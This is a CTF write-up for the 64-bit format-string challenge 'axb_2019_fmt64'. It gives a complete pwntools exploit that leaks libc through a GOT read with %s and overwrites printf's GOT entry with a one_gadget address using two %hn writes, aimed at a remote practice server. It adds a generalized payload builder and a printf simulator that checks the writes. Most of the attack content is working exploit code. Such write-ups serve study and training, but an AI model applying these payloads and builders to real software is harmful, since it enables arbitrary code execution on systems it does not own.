axb_2019_fmt64
A typical fmt challenge. checksec shows only NX, so hijacking a GOT entry is enough to finish it. What puzzled me here, though, is that it does not let me leak libc through the printf function?
Approach
- First leak libc with the fmt bug, then overwrite a GOT entry with a one_gadget address; the entry I overwrite here is printf's. (In the exp below the leak reads the GOT entry of sprintf with %s, and the overwrite lands in printf's GOT entry as two 16-bit %hn writes, with the pointers placed after the format text because their NUL bytes would otherwise terminate it.)
exp
from pwn import *

# our input starts at printf argument 8; the program prints "Repeater:" (9 bytes) in front of it
#p=process('./axb_2019_fmt64')
p=remote('node3.buuoj.cn',28024)
elf=ELF('./axb_2019_fmt64')
#p=gdb.debug('./axb_2019_fmt64','b printf')
libc=ELF('../libc-2.23.so')
one_gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]

#leak libc: "%9$s" is padded to 8 bytes so the GOT address that follows lands on argument 9
p.recvuntil(b"Please tell me:")
p.sendline(b'%9$spppp'+p64(elf.got['sprintf']))
sprintf=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc.address=sprintf-libc.symbols['sprintf']
one_gadget=libc.address+one_gadgets[0]
log.info('one_gadget: '+hex(one_gadget))

#hook got's printf: write the two low 16-bit halves of one_gadget with %hn
#(the 9 bytes of "Repeater:" are already counted before our format runs)
p1=one_gadget&0xffff
p2=(one_gadget>>16)&0xffff
w1=(p1-9)%0x10000
w2=(p2-p1)%0x10000   # %hn keeps only the low 16 bits of the count, so the second width must wrap if p2<p1
payload=b'%'+bytes(str(w1),encoding='utf-8')+b'c%12$hn'
payload+=b'%'+bytes(str(w2),encoding='utf-8')+b'c%13$hn'
payload=payload.ljust(0x20,b'\x00')   # format text ends here; the NULs in the addresses must come after it
payload+=p64(elf.got['printf'])+p64(elf.got['printf']+2)   # arguments 12 and 13
log.info('payload: '+repr(payload))
p.sendline(payload)
#gdb.attach(p)
p.interactive()
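The two steps of the exp (the %s leak and the two-%hn GOT overwrite) as a generalized, added example. This is not the original writeup's code and needs no pwntools: it builds the same payload shapes for any target value and address, orders the two 16-bit halves so every %c width stays positive and reduces widths mod 0x10000 (the plain p2-p1 above breaks when the upper half is smaller), and checks the result against a tiny model of printf's %c/%hn counting. The "Repeater:" prefix and argument offset 8 are taken from the exp; the libc base and GOT address in the demo are constructed numbers, not values from the real binary.

```python
import struct

# Layout assumed from the exploit above (not re-verified here): the program
# prints the 9-byte prefix "Repeater:" before our buffer, and the first 8 bytes
# of our buffer are printf argument 8.
PREFIX = b"Repeater:"
ARG_BASE = 8


def build_leak_payload(leak_addr, arg_base=ARG_BASE):
    """Format string that prints the pointer stored at leak_addr via %s.

    The "%N$s" directive is padded to exactly 8 bytes so the address that
    follows it sits on printf argument arg_base + 1 (the "pppp" trick above).
    """
    fmt = (b"%%%d$s" % (arg_base + 1)).ljust(8, b"p")
    return fmt + struct.pack("<Q", leak_addr)


def build_hn_payload(value, addr, prefix_len=len(PREFIX), arg_base=ARG_BASE, fmt_len=0x20):
    """Write the low 32 bits of value to addr with two %hn writes.

    The two 16-bit halves are written in ascending order so every %c width is
    positive, and each width is reduced mod 0x10000 because %hn only stores the
    low 16 bits of the character count.  The pointers are appended after the
    format text, which is padded to fmt_len, because their NUL bytes would
    otherwise terminate the format string.
    """
    assert fmt_len % 8 == 0, "pointers must start on an 8-byte argument slot"
    halves = sorted([(value & 0xffff, addr), ((value >> 16) & 0xffff, addr + 2)])
    first_ptr_arg = arg_base + fmt_len // 8
    fmt = b""
    printed = prefix_len
    for i, (half, _) in enumerate(halves):
        width = (half - printed) % 0x10000
        if width:                       # width 0: the count is already right
            fmt += b"%%%dc" % width
        fmt += b"%%%d$hn" % (first_ptr_arg + i)
        printed += width
    assert len(fmt) <= fmt_len, "format text does not fit in front of the pointers"
    payload = fmt.ljust(fmt_len, b"\x00")
    for _, ptr in halves:
        payload += struct.pack("<Q", ptr)
    return payload


def simulate_printf(payload, prefix=PREFIX, arg_base=ARG_BASE):
    """Minimal model of printf for %<width>c and %<n>$hn, enough to check a payload.

    Returns (characters printed, {address: 16-bit value written}).  Arguments
    are read from the payload itself, 8 bytes per slot starting at arg_base.
    """
    def arg(n):
        off = (n - arg_base) * 8
        return struct.unpack("<Q", payload[off:off + 8])[0]

    fmt = payload.split(b"\x00", 1)[0]  # printf stops at the first NUL
    count = len(prefix)
    writes = {}
    i = 0
    while i < len(fmt):
        if fmt[i:i + 1] != b"%":
            count += 1                  # literal byte, printed as-is
            i += 1
            continue
        j = i + 1
        while j < len(fmt) and fmt[j:j + 1].isdigit():
            j += 1
        num = int(fmt[i + 1:j]) if j > i + 1 else 0
        if fmt[j:j + 1] == b"c":
            count += max(num, 1)        # %c prints at least one character
            i = j + 1
        elif fmt[j:j + 3] == b"$hn":
            writes[arg(num)] = count & 0xffff
            i = j + 3
        else:
            raise ValueError("unsupported directive in %r" % fmt[i:j + 3])
    return count, writes


def write_lands(value, addr):
    """True if the %hn payload for (value, addr) really writes value's low 32 bits."""
    _, writes = simulate_printf(build_hn_payload(value, addr))
    got = writes.get(addr, 0) | (writes.get(addr + 2, 0) << 16)
    return got == (value & 0xffffffff)


if __name__ == "__main__":
    # Constructed numbers for the demo: a libc base and a GOT slot, not from the real binary.
    one_gadget = 0x7ffff7a0d000 + 0x45216
    printf_got = 0x601040
    print(build_leak_payload(printf_got + 8))
    print(build_hn_payload(one_gadget, printf_got))
    print(write_lands(one_gadget, printf_got), write_lands(0x1234f000, printf_got))
```

With the constructed base the builder emits %8717c%12$hn%54671c%13$hn, the same shape as the exp; for a value whose upper half is below its lower half (0x1234f000) it swaps the pointer order instead of producing a negative width, and the model confirms both cases write the intended 32 bits.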